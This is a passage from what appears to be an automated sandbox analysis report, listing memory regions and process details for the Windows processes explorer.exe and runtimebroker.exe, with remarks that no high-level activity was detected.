| pagefile_0x000000a69bb40000 | 0xa69bb40000 | 0xa69bb4ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000a69bb50000 | 0xa69bb50000 | 0xa69bb5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000a69bb60000 | 0xa69bb60000 | 0xa69bb6ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000a69bb70000 | 0xa69bb70000 | 0xa69cb6ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a69cb70000 | 0xa69cb70000 | 0xa69cb70fff | Private Memory | rw |
|
|
|
- |
| private_0x000000a69cb80000 | 0xa69cb80000 | 0xa69cb80fff | Private Memory | rw |
|
|
|
- |
| private_0x000000a69cb90000 | 0xa69cb90000 | 0xa69cb93fff | Private Memory | rw |
|
|
|
- |
| private_0x000000a69cba0000 | 0xa69cba0000 | 0xa69cba1fff | Private Memory | rw |
|
|
|
- |
| private_0x000000a69cbb0000 | 0xa69cbb0000 | 0xa69cbb0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000a69cbc0000 | 0xa69cbc0000 | 0xa69cc4ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a69cc50000 | 0xa69cc50000 | 0xa6a0c4ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a6a0c50000 | 0xa6a0c50000 | 0xa6a4c4ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a6a4c50000 | 0xa6a4c50000 | 0xa6a4c57fff | Private Memory | rw |
|
|
|
- |
| webcachev01.dat | 0xa6a4c60000 | 0xa6a4c6ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4c70000 | 0xa6a4c7ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4c80000 | 0xa6a4c8ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4c90000 | 0xa6a4c9ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4ca0000 | 0xa6a4caffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4cb0000 | 0xa6a4cbffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4cc0000 | 0xa6a4ccffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4cd0000 | 0xa6a4cdffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4ce0000 | 0xa6a4ceffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4cf0000 | 0xa6a4cfffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4d00000 | 0xa6a4d0ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4d10000 | 0xa6a4d1ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4d20000 | 0xa6a4d2ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4d30000 | 0xa6a4d3ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4d40000 | 0xa6a4d4ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4d50000 | 0xa6a4d5ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000a6a4d60000 | 0xa6a4d60000 | 0xa6a4ddffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a6a4de0000 | 0xa6a4de0000 | 0xa6a4de7fff | Private Memory | rw |
|
|
|
- |
| webcachev01.dat | 0xa6a4df0000 | 0xa6a4dfffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4e00000 | 0xa6a4e0ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4e10000 | 0xa6a4e1ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4e20000 | 0xa6a4e2ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4e30000 | 0xa6a4e3ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4e40000 | 0xa6a4e4ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000a6a4e50000 | 0xa6a4e50000 | 0xa6a4e57fff | Private Memory | rw |
|
|
|
- |
| webcachev01.dat | 0xa6a4e60000 | 0xa6a4e6ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4e70000 | 0xa6a4e7ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000a6a4e80000 | 0xa6a4e80000 | 0xa6a4e8ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| webcachev01.dat | 0xa6a4e90000 | 0xa6a4e9ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4ea0000 | 0xa6a4eaffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4eb0000 | 0xa6a4ebffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4ec0000 | 0xa6a4ecffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4ed0000 | 0xa6a4edffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000a6a4ee0000 | 0xa6a4ee0000 | 0xa6a4f5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000a6a4f60000 | 0xa6a4f60000 | 0xa6a4f6ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| webcachev01.dat | 0xa6a4f70000 | 0xa6a4f7ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4f80000 | 0xa6a4f8ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4f90000 | 0xa6a4f9ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a4fa0000 | 0xa6a4faffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000a6a4fb0000 | 0xa6a4fb0000 | 0xa6a502ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a6a5030000 | 0xa6a5030000 | 0xa6a50affff | Private Memory | rw |
|
|
|
- |
| webcachev01.dat | 0xa6a50b0000 | 0xa6a50bffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a50c0000 | 0xa6a50cffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a50d0000 | 0xa6a50dffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a50e0000 | 0xa6a50effff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a50f0000 | 0xa6a50fffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a5100000 | 0xa6a510ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a5110000 | 0xa6a511ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a5120000 | 0xa6a512ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a5130000 | 0xa6a513ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a5140000 | 0xa6a514ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000a6a5150000 | 0xa6a5150000 | 0xa6a524ffff | Private Memory | rw |
|
|
|
- |
| webcachev01.dat | 0xa6a5250000 | 0xa6a525ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a5260000 | 0xa6a526ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a5270000 | 0xa6a527ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a5280000 | 0xa6a528ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a5290000 | 0xa6a529ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a52a0000 | 0xa6a52affff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a52b0000 | 0xa6a52bffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a52c0000 | 0xa6a52cffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a52d0000 | 0xa6a52dffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a52e0000 | 0xa6a52effff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a52f0000 | 0xa6a52fffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a5300000 | 0xa6a530ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a5310000 | 0xa6a531ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a5320000 | 0xa6a532ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a5330000 | 0xa6a533ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a5340000 | 0xa6a534ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a5350000 | 0xa6a535ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a5360000 | 0xa6a536ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a5370000 | 0xa6a537ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a5380000 | 0xa6a538ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a5390000 | 0xa6a539ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a53a0000 | 0xa6a53affff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a53b0000 | 0xa6a53bffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a53c0000 | 0xa6a53cffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa6a53d0000 | 0xa6a53dffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df5ffbd0000 | 0x7df5ffbd0000 | 0x7ff5ffbcffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff7cf4d4000 | 0x7ff7cf4d4000 | 0x7ff7cf4d5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7cf4d6000 | 0x7ff7cf4d6000 | 0x7ff7cf4d7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7cf4d8000 | 0x7ff7cf4d8000 | 0x7ff7cf4d9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7cf4da000 | 0x7ff7cf4da000 | 0x7ff7cf4dbfff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 51 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #64: explorer.exe
0
0
| Information | Value |
|---|---|
| ID | #64 |
| File Name | c:\windows\explorer.exe |
| Command Line | C:\Windows\Explorer.EXE |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x57c |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
860
0x
5D0
0x
B88
0x
B5C
0x
B54
0x
B50
0x
B4C
0x
B30
0x
B2C
0x
B10
0x
9B8
0x
958
0x
94C
0x
944
0x
92C
0x
920
0x
914
0x
8F4
0x
8F0
0x
8EC
0x
8E4
0x
8E0
0x
8DC
0x
8D8
0x
8D4
0x
89C
0x
898
0x
884
0x
86C
0x
84C
0x
844
0x
840
0x
828
0x
818
0x
810
0x
80C
0x
650
0x
22C
0x
450
0x
298
0x
794
0x
684
0x
680
0x
668
0x
570
0x
8A0
0x
8E0
0x
2F0
0x
72C
0x
3A8
0x
874
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000a90000 | 0x00a90000 | 0x00a9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000aa0000 | 0x00aa0000 | 0x00aa6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ab0000 | 0x00ab0000 | 0x00ac3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ad0000 | 0x00ad0000 | 0x00b4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b50000 | 0x00b50000 | 0x00b53fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b60000 | 0x00b60000 | 0x00b62fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000b70000 | 0x00b70000 | 0x00b71fff | Private Memory | rw |
|
|
|
- |
| iconcache_idx.db | 0x00b90000 | 0x00b91fff | Memory Mapped File | rw |
|
|
|
|
| google chrome.lnk | 0x00ba0000 | 0x00ba0fff | Memory Mapped File | r |
|
|
|
|
| acrobat reader dc.lnk | 0x00ba0000 | 0x00ba0fff | Memory Mapped File | r |
|
|
|
|
| {3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000003c.db | 0x00ba0000 | 0x00bbbfff | Memory Mapped File | r |
|
|
|
|
| {3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000003c.db | 0x00bc0000 | 0x00bdbfff | Memory Mapped File | rw |
|
|
|
|
| iconcache_idx.db | 0x00bc0000 | 0x00bc1fff | Memory Mapped File | rw |
|
|
|
|
| private_0x0000000000c00000 | 0x00c00000 | 0x00cfffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00d00000 | 0x00dbdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000dc0000 | 0x00dc0000 | 0x00dc6fff | Private Memory | rw |
|
|
|
- |
| explorer.exe.mui | 0x00dd0000 | 0x00dd7fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000de0000 | 0x00de0000 | 0x00de0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000df0000 | 0x00df0000 | 0x00df0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e00000 | 0x00e00000 | 0x00e00fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e10000 | 0x00e10000 | 0x00e10fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e20000 | 0x00e20000 | 0x00e20fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000e30000 | 0x00e30000 | 0x00e30fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.1.db | 0x00e40000 | 0x00e43fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000e50000 | 0x00e50000 | 0x00e5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e60000 | 0x00e60000 | 0x00fe7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ff0000 | 0x00ff0000 | 0x01170fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001180000 | 0x01180000 | 0x0257ffff | Pagefile Backed Memory | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db | 0x02580000 | 0x02592fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000025a0000 | 0x025a0000 | 0x025a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000025b0000 | 0x025b0000 | 0x0262ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002630000 | 0x02630000 | 0x026affff | Private Memory | rw |
|
|
|
- |
| {3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000039.db | 0x026b0000 | 0x026ccfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000026d0000 | 0x026d0000 | 0x026d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000026e0000 | 0x026e0000 | 0x026effff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x026f0000 | 0x02a26fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002a30000 | 0x02a30000 | 0x02aaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ab0000 | 0x02ab0000 | 0x02b2ffff | Private Memory | rw |
|
|
|
- |
| shell32.dll.mui | 0x02b30000 | 0x02b90fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002ba0000 | 0x02ba0000 | 0x02ba2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002bb0000 | 0x02bb0000 | 0x02bd9fff | Pagefile Backed Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x02be0000 | 0x02cbefff | Memory Mapped File | r |
|
|
|
- |
| imageres.dll.mui | 0x02cc0000 | 0x02cc0fff | Memory Mapped File | r |
|
|
|
- |
| thumbcache_idx.db | 0x02cd0000 | 0x02cd1fff | Memory Mapped File | rw |
|
|
|
- |
| thumbcache_idx.db | 0x02cf0000 | 0x02cf1fff | Memory Mapped File | rw |
|
|
|
- |
| thumbcache_48.db | 0x02d00000 | 0x02d00fff | Memory Mapped File | rw |
|
|
|
- |
| thumbcache_idx.db | 0x02d10000 | 0x02d11fff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000002d20000 | 0x02d20000 | 0x02d21fff | Pagefile Backed Memory | r |
|
|
|
- |
| iconcache_idx.db | 0x02d30000 | 0x02d31fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002d40000 | 0x02d40000 | 0x02d54fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002d60000 | 0x02d60000 | 0x02d62fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002d70000 | 0x02d70000 | 0x02d71fff | Pagefile Backed Memory | r |
|
|
|
- |
| {3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000003a.db | 0x02d80000 | 0x02d9dfff | Memory Mapped File | r |
|
|
|
- |
| thumbcache_idx.db | 0x02da0000 | 0x02da1fff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000002db0000 | 0x02db0000 | 0x02db2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002dc0000 | 0x02dc0000 | 0x02e3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002e40000 | 0x02e40000 | 0x02e41fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002e50000 | 0x02e50000 | 0x02e51fff | Pagefile Backed Memory | r |
|
|
|
- |
| oleaccrc.dll | 0x02e60000 | 0x02e61fff | Memory Mapped File | r |
|
|
|
- |
| oleaccrc.dll.mui | 0x02e70000 | 0x02e74fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002e80000 | 0x02e80000 | 0x02f37fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002f40000 | 0x02f40000 | 0x02f43fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002f50000 | 0x02f50000 | 0x0304ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003050000 | 0x03050000 | 0x0314ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003150000 | 0x03150000 | 0x03150fff | Private Memory | rw |
|
|
|
- |
| staticcache.dat | 0x03160000 | 0x0419ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000041a0000 | 0x041a0000 | 0x041a6fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000041b0000 | 0x041b0000 | 0x041b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000041c0000 | 0x041c0000 | 0x041c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000041d0000 | 0x041d0000 | 0x041d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000041e0000 | 0x041e0000 | 0x0425ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004260000 | 0x04260000 | 0x04261fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004270000 | 0x04270000 | 0x04270fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004280000 | 0x04280000 | 0x04280fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004290000 | 0x04290000 | 0x04290fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000042a0000 | 0x042a0000 | 0x042a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.1.db | 0x042b0000 | 0x042b3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000042c0000 | 0x042c0000 | 0x042c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000042d0000 | 0x042d0000 | 0x042d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000042e0000 | 0x042e0000 | 0x042e0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000042f0000 | 0x042f0000 | 0x042f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004300000 | 0x04300000 | 0x04338fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000004340000 | 0x04340000 | 0x04342fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004350000 | 0x04350000 | 0x04350fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004360000 | 0x04360000 | 0x04360fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004370000 | 0x04370000 | 0x043effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000043f0000 | 0x043f0000 | 0x043f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004400000 | 0x04400000 | 0x0447ffff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x04480000 | 0x04483fff | Memory Mapped File | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000013.db | 0x04490000 | 0x044d2fff | Memory Mapped File | r |
|
|
|
- |
| propsys.dll.mui | 0x044e0000 | 0x044f0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004500000 | 0x04500000 | 0x04500fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004510000 | 0x04510000 | 0x04510fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004520000 | 0x04520000 | 0x04522fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004530000 | 0x04530000 | 0x04538fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004540000 | 0x04540000 | 0x04548fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004550000 | 0x04550000 | 0x04552fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x04560000 | 0x04563fff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db | 0x04570000 | 0x045fafff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004600000 | 0x04600000 | 0x0467ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004680000 | 0x04680000 | 0x046fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004700000 | 0x04700000 | 0x0477ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004780000 | 0x04780000 | 0x047fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004800000 | 0x04800000 | 0x04ffffff | Private Memory | - |
|
|
|
- |
| private_0x0000000005000000 | 0x05000000 | 0x0507ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005080000 | 0x05080000 | 0x05571fff | Pagefile Backed Memory | rw |
|
|
|
- |
| thumbcache_256.db | 0x05580000 | 0x0567ffff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000005680000 | 0x05680000 | 0x05681fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005690000 | 0x05690000 | 0x05692fff | Pagefile Backed Memory | r |
|
|
|
- |
| iconcache_idx.db | 0x056a0000 | 0x056a1fff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x00000000056b0000 | 0x056b0000 | 0x056b1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000056c0000 | 0x056c0000 | 0x056c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| thumbcache_idx.db | 0x056d0000 | 0x056d1fff | Memory Mapped File | rw |
|
|
|
- |
| windows.storage.dll.mui | 0x056e0000 | 0x056e7fff | Memory Mapped File | r |
|
|
|
- |
| counters.dat | 0x056f0000 | 0x056f0fff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000005700000 | 0x05700000 | 0x0570ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005710000 | 0x05710000 | 0x05710fff | Pagefile Backed Memory | rw |
|
|
|
- |
| iconcache_idx.db | 0x05730000 | 0x05731fff | Memory Mapped File | rw |
|
|
|
- |
| {3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000003b.db | 0x057a0000 | 0x057bbfff | Memory Mapped File | r |
|
|
|
- |
| wscui.cpl.mui | 0x057c0000 | 0x057d1fff | Memory Mapped File | r |
|
|
|
- |
| hcproviders.dll.mui | 0x057e0000 | 0x057e1fff | Memory Mapped File | r |
|
|
|
- |
| actioncenter.dll.mui | 0x057f0000 | 0x057fafff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005800000 | 0x05800000 | 0x0587ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005880000 | 0x05880000 | 0x058fffff | Private Memory | rw |
|
|
|
- |
| iconcache_48.db | 0x05900000 | 0x059fffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000005a00000 | 0x05a00000 | 0x05a7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005a80000 | 0x05a80000 | 0x05b7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005b80000 | 0x05b80000 | 0x05bc7fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005bd0000 | 0x05bd0000 | 0x05bd0fff | Private Memory | rw |
|
|
|
- |
| thumbcache_48.db | 0x05be0000 | 0x05cdffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000005ce0000 | 0x05ce0000 | 0x05ce0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005cf0000 | 0x05cf0000 | 0x05cf1fff | Pagefile Backed Memory | r |
|
|
|
- |
| iconcache_idx.db | 0x05d00000 | 0x05d01fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000005d10000 | 0x05d10000 | 0x05d57fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005d60000 | 0x05d60000 | 0x05d63fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005d70000 | 0x05d70000 | 0x05deffff | Private Memory | rw |
|
|
|
- |
| iconcache_256.db | 0x05df0000 | 0x05df0fff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000005e10000 | 0x05e10000 | 0x05e1ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000005e20000 | 0x05e20000 | 0x05e2ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000005e30000 | 0x05e30000 | 0x05e3ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000005e40000 | 0x05e40000 | 0x05e40fff | Pagefile Backed Memory | rw |
|
|
|
- |
| netmsg.dll | 0x05ee0000 | 0x05ee0fff | Memory Mapped File | r |
|
|
|
- |
| netmsg.dll.mui | 0x05ef0000 | 0x05f21fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005f30000 | 0x05f30000 | 0x05faffff | Private Memory | rw |
|
|
|
- |
| thumbcache_256.db | 0x05fb0000 | 0x060affff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000060d0000 | 0x060d0000 | 0x06117fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006120000 | 0x06120000 | 0x0619ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000061a0000 | 0x061a0000 | 0x061e8fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000061f0000 | 0x061f0000 | 0x061f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006200000 | 0x06200000 | 0x06200fff | Private Memory | rw |
|
|
|
- |
| winnlsres.dll | 0x06210000 | 0x06214fff | Memory Mapped File | r |
|
|
|
- |
| winnlsres.dll.mui | 0x06220000 | 0x0622ffff | Memory Mapped File | r |
|
|
|
- |
| mswsock.dll.mui | 0x06230000 | 0x06232fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000006240000 | 0x06240000 | 0x062bffff | Private Memory | rw |
|
|
|
- |
| iconcache_32.db | 0x06240000 | 0x0633ffff | Memory Mapped File | rw |
|
|
|
|
| iconcache_48.db | 0x06240000 | 0x0633ffff | Memory Mapped File | rw |
|
|
|
|
| private_0x00000000062c0000 | 0x062c0000 | 0x0633ffff | Private Memory | rw |
|
|
|
- |
| appdb.dat | 0x06340000 | 0x086c1fff | Memory Mapped File | rw |
|
|
|
- |
|
For performance reasons, the remaining 343 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #65: runtimebroker.exe
0
0
| Information | Value |
|---|---|
| ID | #65 |
| File Name | c:\windows\system32\runtimebroker.exe |
| Command Line | C:\Windows\System32\RuntimeBroker.exe -Embedding |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
